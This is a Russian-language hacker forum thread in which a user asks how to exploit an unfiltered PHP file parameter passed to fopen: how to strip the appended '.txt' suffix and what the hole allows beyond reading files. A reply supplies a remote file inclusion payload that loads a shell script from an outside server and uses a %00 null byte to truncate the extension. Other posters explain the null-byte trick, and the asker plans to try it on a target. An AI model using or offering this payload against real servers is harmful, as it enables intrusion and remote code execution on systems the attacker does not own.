Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
помогите, уязвимость чтения произвольных файлов на сервере
 
вобшем имеется уязвимость (не фильтруется параметр $_GET['file'])
$file=$_GET['file'].".txt";
fopen($file, r);

........

вобшем чтото в этом духе

как избавится от расширения .txt

гдето слышал что можно так index.php?file=../../index.php?a=
получится fopen("../../index.php?a=.txt", "r"); и он сачтет это за параметр но не выходит ни фига
 
и вообше что через эту уязвимость можно зделать интересно кроме чтения файлов
 
Короче делаеш так index.php?file=http://sever/shell.php%00
 
Цитата
Короче делаеш так index.php?file=http://sever/shell.php%00

спасибо шя попробуем
 
Во-во Goudini правильно пишет...
%00 в данном случае -так называемый NULL BYTE. Он отрезает остальную часть строки.
Правда magic_quotes_gpc слэширует все эти нулл байты, в этом и вся проблема оказывается во многих случаях...
 
Null Byte - очень удобная вещь.
 
ууу Америку открыл! :)
Про то, что нулл байт очень удобная вещь знает даже моя бабушка :)
 
не неработает заменя ется \ вобшем слэшируется :( :( :(
Страницы: 1
Читают тему